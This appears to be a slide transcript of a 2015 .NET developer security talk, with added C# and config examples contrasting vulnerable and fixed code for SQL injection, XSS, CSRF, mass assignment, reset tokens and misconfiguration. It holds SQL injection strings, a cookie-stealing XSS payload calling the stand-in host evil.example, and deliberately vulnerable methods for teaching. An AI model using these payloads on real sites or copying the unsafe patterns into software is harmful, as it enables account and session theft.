Top Security Threats for .NET Developers
Slide 1
Top Security Threats for .NET developers
Mikhail Shcherbakov, Product Manager at Cezurity
10th .NET Developers Conference, 19 April 2015, dotnetconf.ru
Slide 2
About me
Product Manager at Cezurity
One of the core developers of the source code analyzer PT Application Inspector
Former Team Lead at Acronis, Luxoft, Boeing, SPC KRUG
Slide 3
Security Development: Where to Begin?
Slide 4
Security Development
Slide 5
Security Development
How to write code?
Slide 6
Glossary
Slide 7
Glossary
Threat - a potential violation of security (ISO 7498-2).
Impact - consequences for an organization or environment when an attack is realized, or weakness is present.
Attack - a well-defined set of actions that, if successful, would result in either damage to an asset, or undesirable operation.
Slide 8
Glossary
Weakness - a type of mistake in software that, in proper conditions, could contribute to the introduction of vulnerabilities within that software.
Vulnerability - an occurrence of a weakness (or multiple weaknesses) within software, in which the weakness can be used by a party to cause the software to modify or access unintended data, interrupt proper execution, or perform incorrect actions that were not specifically granted to the party who uses the weakness.
Slide 9
Glossary
Need to Deal with Weaknesses!
Slide 10
Classifications
Slide 11
Classifications
https://www.owasp.org/index.php/Category:Attack
Slide 12
Classifications
https://www.owasp.org/index.php/Category:Vulnerability
Slide 13
Classifications
http://projects.webappsec.org/w/page/13246978/Threat%20Classification
Slide 14
Classifications
Create a classification for developers!
Slide 15
Improper Input/Output Handling (Implementation)
Slide 16
Improper Input/Output Handling
SQL Injection
OS Commanding
XML Injection
XPath Injection
XQuery Injection
LDAP Injection
Cross-site scripting (XSS)
Unrestricted File Upload
Path Traversal
HTTP Response Splitting
Content Spoofing
Buffer Overflow
Slide 17
Injection Anatomy
Slide 18
Input Data
' OR 1=1 --
' union all select password FROM CustomerLogin WHERE email = '[email protected]'--
Slide 19
Injection Anatomy
Slide 20
SQL Injection with EF
Show me code!
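The live demo shown at this point did not survive into the slide transcript. What follows is an added example, not the speaker's code: the customer lookup that the "Input Data" payloads target, written three ways with Entity Framework 6. The CustomerLogin entity, the ShopContext class and the table layout are assumptions made for the example.

```csharp
// Added example, not from the talk. Requires the EntityFramework 6 package.
// CustomerLogin, ShopContext and the column names are assumed for illustration.
using System;
using System.ComponentModel.DataAnnotations.Schema;
using System.Data.Entity;
using System.Data.SqlClient;
using System.Linq;

[Table("CustomerLogin")]            // matches the table name used in the slide payload
public class CustomerLogin
{
    public int Id { get; set; }
    public string Email { get; set; }
    public string Password { get; set; }
}

public class ShopContext : DbContext
{
    public DbSet<CustomerLogin> CustomerLogins { get; set; }
}

public static class LoginRepository
{
    // VULNERABLE: the email is concatenated into raw SQL. The payload ' OR 1=1 --
    // turns the WHERE clause into a tautology, and the UNION payload from the
    // slide appends any column the database login is allowed to read.
    public static CustomerLogin FindByEmailUnsafe(ShopContext db, string email)
    {
        string sql = "SELECT * FROM CustomerLogin WHERE Email = '" + email + "'";
        return db.Database.SqlQuery<CustomerLogin>(sql).FirstOrDefault();
    }

    // SAFE: still raw SQL, but the value travels as a parameter. The driver never
    // interprets parameter content as SQL syntax, so quotes and comments are data.
    public static CustomerLogin FindByEmailParameterized(ShopContext db, string email)
    {
        const string sql = "SELECT * FROM CustomerLogin WHERE Email = @email";
        return db.Database
                 .SqlQuery<CustomerLogin>(sql, new SqlParameter("@email", email))
                 .FirstOrDefault();
    }

    // SAFE: LINQ to Entities. EF compiles the expression tree into a parameterized
    // query, so user input cannot change the structure of the statement.
    public static CustomerLogin FindByEmailLinq(ShopContext db, string email)
    {
        return db.CustomerLogins.FirstOrDefault(c => c.Email == email);
    }
}
```

Using EF does not make an application immune: Database.SqlQuery, Database.ExecuteSqlCommand and DbSet.SqlQuery all accept whatever string you hand them, and String.Format or string interpolation into that string is the same bug as the first method. EF6 also accepts {0}-style placeholders in SqlQuery and turns the extra arguments into parameters; an explicit SqlParameter simply leaves no doubt in code review.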
Slide 21
Cross-site scripting (XSS)
Reflected
Stored
DOM-based
Slide 22
Stored XSS
Show me code!
Slide 23
DOM-based XSS
Show me code!
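The stored XSS and DOM-based XSS demos are not in the transcript either. The following is an added example, not the speaker's code, covering both slides: a comment renderer with the stored-XSS sink, its fix with the HTML encoder that Razor's @ syntax and the ASPX <%: %> block call implicitly, and the server side of the DOM-based case, where data is emitted into a script block and later inserted into the page by client code. The Comment class and the stored payload are constructed for the example; the project needs a reference to System.Web.

```csharp
// Added example, not from the talk. Comment, CommentRenderer and the payload
// are constructed for illustration. Reference System.Web for HttpUtility.
using System;
using System.Web;

public class Comment
{
    public string Author { get; set; }
    public string Body { get; set; }
}

public static class CommentRenderer
{
    // Constructed payload of the kind an attacker submits through a comment form.
    // Because it is stored, it runs in the browser of every later visitor.
    public const string StoredPayload =
        "<script>document.location='http://evil.example/?c='+document.cookie</script>";

    // VULNERABLE: stored text is concatenated straight into markup. This is what
    // @Html.Raw(comment.Body) in Razor or <%= comment.Body %> in an ASPX view does.
    public static string RenderUnsafe(Comment c)
    {
        return "<li><b>" + c.Author + "</b>: " + c.Body + "</li>";
    }

    // SAFE in an HTML element context: '<', '>', '&' and '"' become entities, so the
    // browser shows the payload as text. @comment.Body and <%: comment.Body %> do this.
    public static string RenderHtmlContext(Comment c)
    {
        return "<li><b>" + HttpUtility.HtmlEncode(c.Author) + "</b>: "
             + HttpUtility.HtmlEncode(c.Body) + "</li>";
    }

    // DOM-based case: the value lands inside a <script> block and client code later
    // writes it into the document. HTML encoding is the wrong encoder here; use the
    // JavaScript string encoder (addDoubleQuotes emits a quoted literal) and have
    // the client insert the value with textContent, never innerHTML or document.write.
    public static string RenderScriptContext(Comment c)
    {
        string js = HttpUtility.JavaScriptStringEncode(c.Body, addDoubleQuotes: true);
        return "<script>var lastComment = " + js + ";</script>";
    }

    // Self-check for a console project.
    public static void Main()
    {
        var c = new Comment { Author = "mallory", Body = StoredPayload };
        Console.WriteLine(RenderUnsafe(c));        // <script> survives: executes for every visitor
        Console.WriteLine(RenderHtmlContext(c));   // &lt;script&gt;...: rendered as text
        Console.WriteLine(RenderScriptContext(c)); // "\u003cscript\u003e...": a JS string literal
    }
}
```

The rule the example illustrates is that the encoder must match the context the data is written into (HTML body, attribute, JavaScript string, URL), and that the server cannot fix DOM-based XSS alone: once the value is safely inside a JavaScript string, the client-side code still has to use a non-HTML sink such as textContent.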
Slide 24
Insufficient Control Flow Management (Design/Implementation)
Slide 25
Insufficient Control Flow Management
Cross-Site Request Forgery (CSRF)
Mass Assignment
Business Logic Errors
Abuse of Functionality
Slide 26
CSRF
Slide 27
CSRF
ASP.NET MVC: <%= Html.AntiForgeryToken() %> renders
<input name="__RequestVerificationToken" type="hidden" …
ASP.NET Web Forms: __VIEWSTATE, __EVENTVALIDATION (ViewState only ties a form to the user when ViewStateUserKey is set, for example to the session ID)
http://www.jardinesoftware.com/Documents/ASP_Net_Web_Forms_CSRF_Workflow.pdf
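The slide only shows the token the helper emits. As an added example, not the speaker's code, here is the MVC 5 controller side for the two control-flow weaknesses on the previous slide: the anti-forgery check that goes with Html.AntiForgeryToken(), and the view-model pattern that prevents mass assignment. AppUser, ProfileEditModel and IUserRepository are assumed for the example; the Razor view is assumed to contain @Html.AntiForgeryToken() inside @using (Html.BeginForm()).

```csharp
// Added example, not from the talk. AppUser, ProfileEditModel and
// IUserRepository are assumed; the view emits @Html.AntiForgeryToken().
using System.Web.Mvc;

public class AppUser
{
    public int Id { get; set; }
    public string DisplayName { get; set; }
    public string Email { get; set; }
    public bool IsAdmin { get; set; }   // must never be settable from a form post
}

// View model exposing only the fields a user may edit. This is the fix for mass
// assignment and, unlike [Bind(Include = "...")], it cannot drift out of sync
// when someone adds a property to the entity.
public class ProfileEditModel
{
    public string DisplayName { get; set; }
    public string Email { get; set; }
}

public interface IUserRepository
{
    AppUser GetByName(string userName);
    void Update(AppUser u);
}

[Authorize]
public class ProfileController : Controller
{
    private readonly IUserRepository _users;
    public ProfileController(IUserRepository users) { _users = users; }

    // GET /Profile/Edit. The view renders the __RequestVerificationToken hidden
    // field; the matching half of the token is set in a cookie of the same name.
    public ActionResult Edit()
    {
        var u = _users.GetByName(User.Identity.Name);
        return View(new ProfileEditModel { DisplayName = u.DisplayName, Email = u.Email });
    }

    // VULNERABLE on both counts:
    //  1. no anti-forgery check, so any site can submit this form on the victim's
    //     behalf using the victim's authentication cookie;
    //  2. the entity is the binding target, so IsAdmin=true in the POST body is
    //     copied into the database (mass assignment).
    [HttpPost]
    public ActionResult EditUnsafe(AppUser posted)
    {
        _users.Update(posted);
        return RedirectToAction("Edit");
    }

    // SAFE: the hidden field must match the token cookie, and only whitelisted
    // fields are copied onto the record of the currently authenticated user.
    [HttpPost]
    [ValidateAntiForgeryToken]
    public ActionResult Edit(ProfileEditModel form)
    {
        if (!ModelState.IsValid) return View(form);

        var u = _users.GetByName(User.Identity.Name);
        u.DisplayName = form.DisplayName;
        u.Email = form.Email;
        _users.Update(u);
        return RedirectToAction("Edit");
    }
}
```

Two checks worth making in review: every state-changing action is [HttpPost] and [ValidateAntiForgeryToken] (a GET that changes state is forgeable by a plain image tag), and no action takes a persisted entity as its parameter.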
Slide 28
Business Logic Error
Samples
Slide 29
Sensitive Data Exposure (Design/Implementation/Deployment)
Slide 30
Sensitive Data Exposure
Insufficient Transport Layer Protection
Insecure Cryptographic Storage
Insufficient Client-side Data Protection
Slide 31
Improper Access Control (Design/Implementation/Deployment)
Slide 32
Improper Access Control
Insufficient Authentication
Insufficient Authorization
Insufficient Password Recovery
Insufficient Session Expiration
Credential/Session Prediction
Improper File System Permissions
Brute Force
Insufficient Anti-automation
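Three items on this list (Insufficient Password Recovery, Insufficient Session Expiration, Credential/Session Prediction) usually meet in one place: the password-reset token. The following is an added example, not the speaker's code, contrasting a token drawn from System.Random with one drawn from the OS CSPRNG, stored only as a hash, time-limited and single-use. The in-memory ticket store and the 30-minute lifetime are assumptions made for the example.

```csharp
// Added example, not from the talk. The in-memory ConcurrentDictionary stands in
// for a database table; the lifetime and token length are illustrative choices.
using System;
using System.Collections.Concurrent;
using System.Security.Cryptography;
using System.Text;

public sealed class PasswordResetService
{
    private sealed class Ticket
    {
        public string UserName;
        public DateTime ExpiresUtc;
    }

    private static readonly TimeSpan Lifetime = TimeSpan.FromMinutes(30);
    private readonly ConcurrentDictionary<string, Ticket> _tickets =
        new ConcurrentDictionary<string, Ticket>();

    // PREDICTABLE: System.Random is seeded from the clock and its internal state is
    // recoverable from a few outputs. An attacker who requests a reset for their own
    // account can reproduce the token issued to the victim moments later.
    public static string IssueTokenWeak()
    {
        var rnd = new Random();
        return rnd.Next().ToString("x8");       // 31 bits at most, and not random
    }

    // UNPREDICTABLE: 256 bits from the OS CSPRNG, encoded URL-safe for the reset link.
    // Only the SHA-256 of the token is kept, so a read of the store does not yield
    // live tokens.
    public string IssueToken(string userName)
    {
        var bytes = new byte[32];
        using (var rng = new RNGCryptoServiceProvider())
            rng.GetBytes(bytes);

        string token = Convert.ToBase64String(bytes).TrimEnd('=').Replace('+', '-').Replace('/', '_');
        _tickets[Fingerprint(token)] = new Ticket
        {
            UserName = userName,
            ExpiresUtc = DateTime.UtcNow + Lifetime
        };
        return token;
    }

    // Single-use and time-limited: the ticket is removed on the first attempt,
    // whether or not it turns out to be expired.
    public bool TryRedeem(string token, out string userName)
    {
        userName = null;
        Ticket t;
        if (!_tickets.TryRemove(Fingerprint(token), out t)) return false;
        if (DateTime.UtcNow > t.ExpiresUtc) return false;
        userName = t.UserName;
        return true;
    }

    private static string Fingerprint(string token)
    {
        using (var sha = SHA256.Create())
            return Convert.ToBase64String(sha.ComputeHash(Encoding.UTF8.GetBytes(token)));
    }
}
```

The same reasoning applies to session identifiers, "remember me" cookies and API keys: anything that grants access on presentation must come from RNGCryptoServiceProvider (or an equivalent CSPRNG), carry enough entropy that guessing is hopeless, and expire. The Insufficient Authorization item is separate: a valid token still has to be checked against the resource it is used on, for example that the user in the ticket owns the account being reset.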
Slide 33
Security Misconfiguration (Deployment)
Slide 34
Security Misconfiguration
Application Misconfiguration
Server Misconfiguration
Information Exposure Through an Error Message
Information Leakage
Directory Indexing
Insecure Indexing
Using Components with Known Vulnerabilities
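Most of the items on this slide map to a handful of web.config settings that ship with insecure defaults in a fresh project or get flipped for debugging and never flipped back. The following is an added example, not from the talk: a production web.config fragment for an ASP.NET 4.5 site with the relevant settings and the weakness each one closes. The login URL and error page path are assumptions.

```xml
<!-- Added example, not from the talk. ~/Account/Login and ~/Error are assumed paths. -->
<configuration>
  <system.web>
    <!-- debug="true" disables timeouts and batching and puts source lines in error pages -->
    <compilation debug="false" targetFramework="4.5" />

    <!-- mode="Off" sends the full stack trace and source excerpt to remote clients
         (Information Exposure Through an Error Message). RemoteOnly keeps the detailed
         page for localhost and shows the generic page to everyone else. -->
    <customErrors mode="RemoteOnly" defaultRedirect="~/Error" />

    <!-- Session and auth cookies unreadable by script and only sent over HTTPS -->
    <httpCookies httpOnlyCookies="true" requireSSL="true" />

    <!-- Stop advertising the framework version in the X-AspNet-Version header
         (Information Leakage) -->
    <httpRuntime enableVersionHeader="false" targetFramework="4.5" />

    <authentication mode="Forms">
      <!-- requireSSL keeps the ticket off plain HTTP; a fixed, short timeout limits
           how long a stolen ticket stays valid (Insufficient Session Expiration) -->
      <forms loginUrl="~/Account/Login" requireSSL="true" timeout="20" slidingExpiration="false" />
    </authentication>
  </system.web>

  <system.webServer>
    <!-- Directory Indexing: never list directory contents -->
    <directoryBrowse enabled="false" />

    <httpProtocol>
      <customHeaders>
        <remove name="X-Powered-By" />
        <add name="X-Content-Type-Options" value="nosniff" />
        <add name="X-Frame-Options" value="DENY" />
      </customHeaders>
    </httpProtocol>
  </system.webServer>
</configuration>
```

Two settings cannot be expressed in web.config: the X-AspNetMvc-Version header is removed with MvcHandler.DisableMvcResponseHeader = true in Application_Start, and the "Using Components with Known Vulnerabilities" item is a question for the packages.config file, not the server, so keep NuGet dependencies current and check them against published advisories as part of the build.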
Slide 35
Summary
OWASP Top Ten Project (2010/2013) http://bit.ly/1OffewO
OWASP .NET Project http://bit.ly/1cz62Sv
Vladimir Kochetkov Blog http://bit.ly/1DecXWI
Troy Hunt Blog www.troyhunt.com
OWASP Developer Guide http://bit.ly/1JcQLoh
CWE/SANS Top 25 Most Dangerous Software Errors (2011) http://bit.ly/1bjDTOH
Slide 36
Thank you for your attention!
Mikhail Shcherbakov
linkedin.com/in/mikhailshcherbakov
github.com/yuske
@yu5k3
Product Manager at Cezurity